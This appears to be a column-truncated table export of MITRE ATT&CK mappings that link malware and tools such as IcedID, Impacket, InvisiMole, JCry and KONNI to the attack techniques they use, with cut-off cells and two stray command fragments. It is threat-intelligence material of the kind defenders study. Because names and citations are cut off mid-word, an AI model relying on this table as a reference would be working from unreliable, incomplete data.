S0483 IcedID malware-- software uses T1189 Drive-by C attack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1027.009Embeddedattack-pat technique
S0483 IcedID malware-- software uses T1027.013Encrypted/attack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1048.002Exfiltrati attack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1105 Ingress Tooattack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1204.002Malicious Fattack-pat technique [IcedID](h
S0483 IcedID malware-- software uses T1036.005Match Legiattack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1218.007Msiexec attack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1106 Native API attack-pat technique [IcedID](h
S0483 IcedID malware-- software uses T1135 Network Shattack-pat technique [IcedID](h
S0483 IcedID malware-- software uses T1069 Permissionattack-pat technique [IcedID](h
S0483 IcedID malware-- software uses T1055.012Process Hoattack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1547.001Registry Ruattack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1218.011Rundll32 attack-pat technique [IcedID](h
S0483 IcedID malware-- software uses T1053.005Scheduled attack-pat technique [IcedID](h
[IcedID](https://attack.mitre.
S0483 IcedID malware-- software uses T1518.001Security S attack-pat technique ` WMIC.exe WMIC /Node:loc
S0483 IcedID malware-- software uses T1027.002Software Pattack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1566.001Spearphishattack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1027.003Steganogr attack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1082 System Inf attack-pat technique [IcedID](h
` cmd.exe /c chcp >&2`.(Citati
S0483 IcedID malware-- software uses T1614.001System Lanattack-pat technique
S0483 IcedID malware-- software uses T1016 System Netattack-pat technique [IcedID](h
S0483 IcedID malware-- software uses T1497 Virtualiza attack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1059.005Visual Basiattack-pat technique [IcedID](ht
S0483 IcedID malware-- software uses T1071.001Web Protocattack-pat technique [IcedID](h
S0483 IcedID malware-- software uses T1047 Windows M attack-pat technique [IcedID](ht
S0434 Imminent tool--8f8c software uses T1123 Audio Captattack-pat technique [Imminent
S0434 Imminent tool--8f8c software uses T1059 Command attack-pat
an technique [Imminent
S0434 Imminent tool--8f8c software uses T1496.001Compute Hiattack-pat technique [Imminent
S0434 Imminent tool--8f8c software uses T1555.003Credential attack-pat technique [Imminent
S0434 Imminent tool--8f8c software uses T1140 Deobfuscatattack-pat technique [Imminent
S0434 Imminent tool--8f8c software uses T1562.001Disable or attack-pat technique [Imminent
S0434 Imminent tool--8f8c software uses T1041 Exfiltratio attack-pat technique [Imminent
S0434 Imminent tool--8f8c software uses T1070.004File Deleti attack-pat technique [Imminent M
S0434 Imminent tool--8f8c software uses T1083 File and Di attack-pat technique [Imminent M
S0434 Imminent tool--8f8c software uses T1564.001Hidden Fileattack-pat technique [Imminent M
S0434 Imminent tool--8f8c software uses T1056.001Keyloggingattack-pat technique [Imminent
S0434 Imminent tool--8f8c software uses T1106 Native API attack-pat technique [Imminent
S0434 Imminent tool--8f8c software uses T1027 Obfuscatedattack-pat technique [Imminent
S0434 Imminent tool--8f8c software uses T1057 Process Di attack-pat technique [Imminent M
S0434 Imminent tool--8f8c software uses T1021.001Remote Des attack-pat technique [Imminent
S0434 Imminent tool--8f8c software uses T1125 Video Captattack-pat technique [Imminent
S0357 Impacket tool--26c8 software uses T1558.005Ccache Fileattack-pat technique [Impacket](
S0357 Impacket tool--26c8 software uses T1558.003Kerberoastattack-pat technique [Impacket](
S0357 Impacket tool--26c8 software uses T1557.001LLMNR/NBT attack-pat technique [Impacket](
S0357 Impacket tool--26c8 software uses T1003.004LSA Secret attack-pat technique SecretsDum
S0357 Impacket tool--26c8 software uses T1003.001LSASS Memattack-pat technique SecretsDum
S0357 Impacket tool--26c8 software uses T1003.003NTDS attack-pat technique SecretsDum
S0357 Impacket tool--26c8 software uses T1040 Network Snattack-pat technique [Impacket](
S0357 Impacket tool--26c8 software uses T1003.002Security A attack-pat technique SecretsDum
S0357 Impacket tool--26c8 software uses T1569.002Service Ex attack-pat technique [Impacket](
S0357 Impacket tool--26c8 software uses T1047 Windows M attack-pat technique [Impacket]
S0604 Industroyemalware--esoftware uses T1499.004Applicationattack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1554 Compromise attack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1485 Data Destrattack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1140 Deobfuscatattack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1041 Exfiltratio attack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1083 File and Di attack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1105 Ingress Tooattack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1090.003Multi-hop attack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1046 Network Seattack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1027 Obfuscatedattack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1572 Protocol T attack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1012 Query Regiattack-pat technique [Industroy
S0604 Industroyemalware--esoftware uses T1018 Remote Sysattack-pat technique [Industroy
S0604 Industroyemalware--esoftware uses T1489 Service Stoattack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1082 System Inf attack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1016 System Netattack-pat technique [Industroy
S0604 Industroyemalware--esoftware uses T1078 Valid Acco attack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1071.001Web Protocattack-pat technique [Industroye
S0604 Industroyemalware--esoftware uses T1543.003Windows Se attack-pat technique [Industroye
S1072 Industroyemalware-- software uses T1057 Process Di attack-pat technique [Industroye
S0259 InnaputRAmalware--csoftware uses T1070.004File Deleti attack-pat technique [InnaputRAT
S0259 InnaputRAmalware--csoftware uses T1083 File and Di attack-pat technique [InnaputRAT
S0259 InnaputRAmalware--csoftware uses T1036.004Masquerade attack-pat technique [InnaputRA
S0259 InnaputRAmalware--csoftware uses T1036.005Match Legiattack-pat technique [InnaputRA
S0259 InnaputRAmalware--csoftware uses T1106 Native API attack-pat technique [InnaputRAT
S0259 InnaputRAmalware--csoftware uses T1027 Obfuscatedattack-pat technique [InnaputRAT
S0259 InnaputRAmalware--csoftware uses T1547.001Registry Ruattack-pat technique Some [Inna
S0259 InnaputRAmalware--csoftware uses T1082 System Inf attack-pat technique [InnaputRA
S0259 InnaputRAmalware--csoftware uses T1059.003Windows Cattack-pat technique [InnaputRA
S0259 InnaputRAmalware--csoftware uses T1543.003Windows Se attack-pat technique Some [Innap
S0260 InvisiMole malware-- software uses T1010 Applicatio attack-pat technique [InvisiMol
S0260 InvisiMole malware-- software uses T1560.003Archive vi attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1560.002Archive viaattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1560.001Archive viaattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1055.004Asynchronoattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1123 Audio Captattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1119 Automatedattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1548.002Bypass Useattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1559.001Componentattack-pat technique [InvisiMol
S0260 InvisiMole malware-- software uses T1218.002Control Pa attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1574.001DLL Searchattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1071.004DNS attack-pat technique [InvisiMol
S0260 InvisiMole malware-- software uses T1005 Data from attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1025 Data from attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1140 Deobfuscatattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1562.004Disable or attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1480.001Environmen attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1203 Exploitatioattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1068 Exploitatioattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1210 Exploitatioattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1090.002External Prattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1008 Fallback C attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1070.004File Deleti attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1083 File and Di attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1564.001Hidden Fileattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1564.003Hidden Wi attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1027.005Indicator attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1105 Ingress Tooattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1490 Inhibit Sy attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1090.001Internal Prattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1059.007JavaScript attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1056.001Keyloggingattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1055.015ListPlantin attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1087.001Local Acco attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1074.001Local Data attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1204.002Malicious Fattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1036.004Masquerade attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1036.005Match Legiattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1112 Modify Regattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1106 Native API attack-pat technique [InvisiMol
S0260 InvisiMole malware-- software uses T1046 Network Seattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1070.005Network Shattack-pat technique [InvisiMole](https://attack.m
S0260 InvisiMole malware-- software uses T1135 Network Shattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1095 Non-Applicattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1132.002Non-Standaattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1027 Obfuscatedattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1055.002Portable Exattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1057 Process Di attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1055 Process Injattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1001.003Protocol o attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1012 Query Regiattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1547.001Registry Ruattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1218.011Rundll32 attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1053.005Scheduled attack-pat technique [InvisiMol
S0260 InvisiMole malware-- software uses T1113 Screen Capattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1518.001Security S attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1569.002Service Ex attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1547.009Shortcut Mattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1518 Software Dattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1573.001Symmetric attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1497.001System Cheattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1082 System Inf attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1016 System Netattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1033 System Own attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1007 System Serattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1124 System Timattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1080 Taint Shar attack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1070.006Timestompattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1125 Video Captattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1071.001Web Protocattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1059.003Windows Cattack-pat technique [InvisiMole
S0260 InvisiMole malware-- software uses T1543.003Windows Se attack-pat technique [InvisiMole
S0231 Invoke-PSI tool--b52dsoftware uses T1027.009Embeddedattack-pat technique [Invoke-PS
S0231 Invoke-PSI tool--b52dsoftware uses T1027.003Steganogr attack-pat technique [Invoke-PSI
S0581 IronNetInj tool--b159software uses T1140 Deobfuscatattack-pat technique [IronNetInj
S0581 IronNetInj tool--b159software uses T1055.001Dynamic-linattack-pat technique [IronNetInj
S0581 IronNetInj tool--b159software uses T1027.013Encrypted/attack-pat technique [IronNetInj
S0581 IronNetInj tool--b159software uses T1036.004Masquerade attack-pat technique [IronNetInj
S0581 IronNetInj tool--b159software uses T1057 Process Di attack-pat technique [IronNetIn
S0581 IronNetInj tool--b159software uses T1055 Process Injattack-pat technique [IronNetInj
S0581 IronNetInj tool--b159software uses T1059.006Python attack-pat technique [IronNetInj
S0581 IronNetInj tool--b159software uses T1053.005Scheduled attack-pat technique [IronNetInj
S0015 Ixeshe malware-- software uses T1005 Data from attack-pat technique [Ixeshe](ht
S0015 Ixeshe malware-- software uses T1070.004File Deleti attack-pat technique [Ixeshe](ht
S0015 Ixeshe malware-- software uses T1083 File and Di attack-pat technique [Ixeshe](ht
S0015 Ixeshe malware-- software uses T1564.001Hidden Fileattack-pat technique [Ixeshe](ht
S0015 Ixeshe malware-- software uses T1105 Ingress Tooattack-pat technique [Ixeshe](ht
S0015 Ixeshe malware-- software uses T1036.005Match Legiattack-pat technique [Ixeshe](ht
S0015 Ixeshe malware-- software uses T1057 Process Di attack-pat technique [Ixeshe](ht
S0015 Ixeshe malware-- software uses T1547.001Registry Ruattack-pat technique [Ixeshe](h
S0015 Ixeshe malware-- software uses T1132.001Standard Eattack-pat technique [Ixeshe](h
S0015 Ixeshe malware-- software uses T1082 System Inf attack-pat technique [Ixeshe](ht
S0015 Ixeshe malware-- software uses T1016 System Netattack-pat technique [Ixeshe](ht
S0015 Ixeshe malware-- software uses T1033 System Own attack-pat technique [Ixeshe](ht
S0015 Ixeshe malware-- software uses T1007 System Serattack-pat technique [Ixeshe](ht
S0015 Ixeshe malware-- software uses T1071.001Web Protocattack-pat technique [Ixeshe](h
S0015 Ixeshe malware-- software uses T1059.003Windows Cattack-pat technique [Ixeshe](ht
S0389 JCry malware--asoftware uses T1486 Data Encryattack-pat technique [JCry](http
S0389 JCry malware--asoftware uses T1490 Inhibit Sy attack-pat technique [JCry](http
S0389 JCry malware--asoftware uses T1204.002Malicious Fattack-pat technique [JCry](http
S0389 JCry malware--asoftware uses T1059.001PowerShellattack-pat technique [JCry](http
S0389 JCry malware--asoftware uses T1547.001Registry Ruattack-pat technique [JCry](http
S0389 JCry malware--asoftware uses T1059.005Visual Basiattack-pat technique [JCry](http
S0389 JCry malware--asoftware uses T1059.003Windows Cattack-pat technique [JCry](htt
S0044 JHUHUGIT malware-- software uses T1115 Clipboard attack-pat technique A [JHUHUGIT
S0044 JHUHUGIT malware-- software uses T1546.015Componentattack-pat technique [JHUHUGIT]
S0044 JHUHUGIT malware-- software uses T1027.013Encrypted/attack-pat technique Many string
S0044 JHUHUGIT malware-- software uses T1068 Exploitatioattack-pat technique [JHUHUGIT](
S0044 JHUHUGIT malware-- software uses T1008 Fallback C attack-pat technique [JHUHUGIT](
S0044 JHUHUGIT malware-- software uses T1070.004File Deleti attack-pat technique The [JHUHUG
S0044 JHUHUGIT malware-- software uses T1105 Ingress Tooattack-pat technique [JHUHUGIT](
S0044 JHUHUGIT malware-- software uses T1037.001Logon Scri attack-pat technique [JHUHUGIT]
S0044 JHUHUGIT malware-- software uses T1057 Process Di attack-pat technique [JHUHUGIT](
S0044 JHUHUGIT malware-- software uses T1055 Process Injattack-pat technique [JHUHUGIT](
S0044 JHUHUGIT malware-- software uses T1547.001Registry Ruattack-pat technique [JHUHUGIT](
S0044 JHUHUGIT malware-- software uses T1218.011Rundll32 attack-pat technique [JHUHUGIT](
S0044 JHUHUGIT malware-- software uses T1053.005Scheduled attack-pat technique [JHUHUGIT](
S0044 JHUHUGIT malware-- software uses T1113 Screen Capattack-pat technique A [JHUHUGIT
S0044 JHUHUGIT malware-- software uses T1132.001Standard Eattack-pat technique A [JHUHUGI
S0044 JHUHUGIT malware-- software uses T1082 System Inf attack-pat technique [JHUHUGIT]
S0044 JHUHUGIT malware-- software uses T1016 System Netattack-pat technique A [JHUHUGIT
S0044 JHUHUGIT malware-- software uses T1071.001Web Protocattack-pat technique [JHUHUGIT](
S0044 JHUHUGIT malware-- software uses T1059.003Windows Cattack-pat technique [JHUHUGIT](
S0044 JHUHUGIT malware-- software uses T1543.003Windows Se attack-pat technique [JHUHUGIT](
S0201 JPIN malware-- software uses T1197 BITS Jobs attack-pat technique A [JPIN](ht
S0201 JPIN malware-- software uses T1562.001Disable or attack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1070.004File Deleti attack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1071.002File Transf attack-pat technique [JPIN](htt
S0201 JPIN malware-- software uses T1083 File and Di attack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1105 Ingress Tooattack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1056.001Keyloggingattack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1069.001Local Grouattack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1071.003Mail Protocattack-pat technique [JPIN](htt
S0201 JPIN malware-- software uses T1027 Obfuscatedattack-pat technique A [JPIN](ht
S0201 JPIN malware-- software uses T1057 Process Di attack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1055 Process Injattack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1012 Query Regiattack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1518.001Security S attack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1082 System Inf attack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1016 System Netattack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1033 System Own attack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1007 System Serattack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1059.003Windows Cattack-pat technique [JPIN](http
S0201 JPIN malware-- software uses T1222.001Windows Fiattack-pat technique [JPIN](http
S0648 JSS Loader malware-- software uses T1105 Ingress Tooattack-pat technique [JSS Loader
S0648 JSS Loader malware-- software uses T1059.007JavaScript attack-pat technique [JSS Loader
S0648 JSS Loader malware-- software uses T1204.002Malicious Fattack-pat technique [JSS Loader
S0648 JSS Loader malware-- software uses T1059.001PowerShellattack-pat technique [JSS Loader
S0648 JSS Loader malware-- software uses T1053.005Scheduled attack-pat technique [JSS Loader
S0648 JSS Loader malware-- software uses T1566.001Spearphishattack-pat technique [JSS Loader
S0648 JSS Loader malware-- software uses T1059.005Visual Basiattack-pat technique [JSS Loader
S0163 Janicab malware-- software uses T1123 Audio Captattack-pat technique [Janicab](h
S0163 Janicab malware-- software uses T1553.002Code Signi attack-pat technique [Janicab](h
S0163 Janicab malware-- software uses T1053.003Cron attack-pat technique [Janicab](h
S0163 Janicab malware-- software uses T1113 Screen Capattack-pat technique [Janicab](h
S0528 Javali malware-- software uses T1027.001Binary Padattack-pat technique [Javali](ht
S0528 Javali malware-- software uses T1555.003Credential attack-pat technique [Javali](ht
S0528 Javali malware-- software uses T1574.002DLL Side-L attack-pat technique [Javali](ht
S0528 Javali malware-- software uses T1102.001Dead Dropattack-pat technique [Javali](ht
S0528 Javali malware-- software uses T1105 Ingress Tooattack-pat technique [Javali](ht
S0528 Javali malware-- software uses T1204.002Malicious Fattack-pat technique [Javali](ht
S0528 Javali malware-- software uses T1204.001Malicious Lattack-pat technique [Javali](ht
S0528 Javali malware-- software uses T1218.007Msiexec attack-pat technique [Javali](ht
S0528 Javali malware-- software uses T1057 Process Di attack-pat technique [Javali](ht
S0528 Javali malware-- software uses T1566.001Spearphishattack-pat technique [Javali](ht
S0528 Javali malware-- software uses T1566.002Spearphishattack-pat technique [Javali](ht
S0528 Javali malware-- software uses T1059.005Visual Basiattack-pat technique [Javali](ht
S0215 KARAE malware--3software uses T1102.002Bidirectio attack-pat technique [KARAE](ht
S0215 KARAE malware--3software uses T1189 Drive-by C attack-pat technique [KARAE](htt
S0215 KARAE malware--3software uses T1105 Ingress Tooattack-pat technique [KARAE](ht
S0215 KARAE malware--3software uses T1082 System Inf attack-pat technique [KARAE](htt
S0271 KEYMARBLmalware-- software uses T1070.004File Deleti attack-pat technique [KEYMARBLE]
S0271 KEYMARBLmalware-- software uses T1083 File and Di attack-pat technique [KEYMARBLE
S0271 KEYMARBLmalware-- software uses T1105 Ingress Tooattack-pat technique [KEYMARBLE
S0271 KEYMARBLmalware-- software uses T1112 Modify Regattack-pat technique [KEYMARBLE
S0271 KEYMARBLmalware-- software uses T1057 Process Di attack-pat technique [KEYMARBLE
S0271 KEYMARBLmalware-- software uses T1113 Screen Capattack-pat technique [KEYMARBLE
S0271 KEYMARBLmalware-- software uses T1573.001Symmetric attack-pat technique [KEYMARBLE
S0271 KEYMARBLmalware-- software uses T1082 System Inf attack-pat technique [KEYMARBLE]
S0271 KEYMARBLmalware-- software uses T1016 System Netattack-pat technique [KEYMARBLE
S0271 KEYMARBLmalware-- software uses T1059.003Windows Cattack-pat technique [KEYMARBLE
S1051 KEYPLUG malware-- software uses T1573.002Asymmetricattack-pat technique [KEYPLUG](
S1051 KEYPLUG malware-- software uses T1102.001Dead Dropattack-pat technique The [KEYPL
S1051 KEYPLUG malware-- software uses T1140 Deobfuscatattack-pat technique [KEYPLUG](h
S1051 KEYPLUG malware-- software uses T1027.013Encrypted/attack-pat technique [KEYPLUG](
S1051 KEYPLUG malware-- software uses T1095 Non-Applicattack-pat technique [KEYPLUG](https://attack.mit
S1051 KEYPLUG malware-- software uses T1090 Proxy attack-pat technique [KEYPLUG](
S1051 KEYPLUG malware-- software uses T1124 System Timattack-pat technique [KEYPLUG](h
S1051 KEYPLUG malware-- software uses T1071.001Web Protocattack-pat technique [KEYPLUG](
S0526 KGH_SPY malware-- software uses T1555 Credential attack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1555.003Credential attack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1005 Data from attack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1140 Deobfuscatattack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1027.013Encrypted/attack-pat technique [KGH_SPY](h
S0526 KGH_SPY malware-- software uses T1041 Exfiltratio attack-pat technique [KGH_SPY](h
S0526 KGH_SPY malware-- software uses T1083 File and Di attack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1105 Ingress Tooattack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1056.001Keyloggingattack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1074.001Local Data attack-pat technique [KGH_SPY](h
S0526 KGH_SPY malware-- software uses T1114.001Local Emailattack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1037.001Logon Scri attack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1204.002Malicious Fattack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1036.005Match Legiattack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1059.001PowerShellattack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1518 Software Dattack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1082 System Inf attack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1071.001Web Protocattack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1059.003Windows Cattack-pat technique [KGH_SPY](
S0526 KGH_SPY malware-- software uses T1555.004Windows Cattack-pat technique [KGH_SPY](
S0669 KOCTOPUSmalware--dsoftware uses T1548.002Bypass Useattack-pat technique [KOCTOPUS]
S0669 KOCTOPUSmalware--dsoftware uses T1070.009Clear Persiattack-pat technique [KOCTOPUS](
S0669 KOCTOPUSmalware--dsoftware uses T1027.010Command aOttack-pat technique [KOCTOPUS]
S0669 KOCTOPUSmalware--dsoftware uses T1140 Deobfuscatattack-pat technique [KOCTOPUS]
S0669 KOCTOPUSmalware--dsoftware uses T1562.001Disable or attack-pat technique [KOCTOPUS](
S0669 KOCTOPUSmalware--dsoftware uses T1564.003Hidden Wi attack-pat technique [KOCTOPUS]
S0669 KOCTOPUSmalware--dsoftware uses T1105 Ingress Tooattack-pat technique [KOCTOPUS]
S0669 KOCTOPUSmalware--dsoftware uses T1204.002Malicious Fattack-pat technique [KOCTOPUS](
S0669 KOCTOPUSmalware--dsoftware uses T1204.001Malicious Lattack-pat technique [KOCTOPUS](
S0669 KOCTOPUSmalware--dsoftware uses T1036.005Match Legiattack-pat technique [KOCTOPUS](
S0669 KOCTOPUSmalware--dsoftware uses T1112 Modify Regattack-pat technique [KOCTOPUS]
S0669 KOCTOPUSmalware--dsoftware uses T1106 Native API attack-pat technique [KOCTOPUS]
S0669 KOCTOPUSmalware--dsoftware uses T1059.001PowerShellattack-pat technique [KOCTOPUS]
S0669 KOCTOPUSmalware--dsoftware uses T1090 Proxy attack-pat technique [KOCTOPUS](
S0669 KOCTOPUSmalware--dsoftware uses T1547.001Registry Ruattack-pat technique [KOCTOPUS]
S0669 KOCTOPUSmalware--dsoftware uses T1566.001Spearphishattack-pat technique [KOCTOPUS]
S0669 KOCTOPUSmalware--dsoftware uses T1566.002Spearphishattack-pat technique [KOCTOPUS](
S0669 KOCTOPUSmalware--dsoftware uses T1082 System Inf attack-pat technique [KOCTOPUS]
S0669 KOCTOPUSmalware--dsoftware uses T1059.005Visual Basiattack-pat technique [KOCTOPUS]
S0669 KOCTOPUSmalware--dsoftware uses T1059.003Windows Cattack-pat technique [KOCTOPUS](
S0156 KOMPROGmalware-- software uses T1082 System Inf attack-pat technique [KOMPROGO]
S0156 KOMPROGmalware-- software uses T1059.003Windows Cattack-pat technique [KOMPROGO](
S0156 KOMPROGmalware-- software uses T1047 Windows M attack-pat technique [KOMPROGO]
S0356 KONNI malware-- software uses T1560 Archive Coattack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1548.002Bypass Useattack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1115 Clipboard attack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1546.015Componentattack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1134.002Create Proattack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1555.003Credential attack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1005 Data from attack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1140 Deobfuscatattack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1027.013Encrypted/attack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1041 Exfiltratio attack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1048.003Exfiltrati attack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1070.004File Deleti attack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1083 File and Di attack-pat technique A version o
S0356 KONNI malware-- software uses T1105 Ingress Tooattack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1059.007JavaScript attack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1056.001Keyloggingattack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1204.002Malicious Fattack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1036.004Masquerade attack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1036.005Match Legiattack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1112 Modify Regattack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1106 Native API attack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1134.004Parent PIDattack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1059.001PowerShellattack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1057 Process Di attack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1547.001Registry Ruattack-pat technique A version o
S0356 KONNI malware-- software uses T1218.011Rundll32 attack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1113 Screen Capattack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1547.009Shortcut Mattack-pat technique A version o
S0356 KONNI malware-- software uses T1027.002Software Pattack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1566.001Spearphishattack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1132.001Standard Eattack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1573.001Symmetric attack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1082 System Inf attack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1016 System Netattack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1049 System Netattack-pat technique [KONNI](ht
S0356 KONNI malware-- software uses T1033 System Own attack-pat technique [KONNI](htt
S0356 KONNI malware-- software uses T1071.001Web Protocattack-pat technique [KONNI](ht
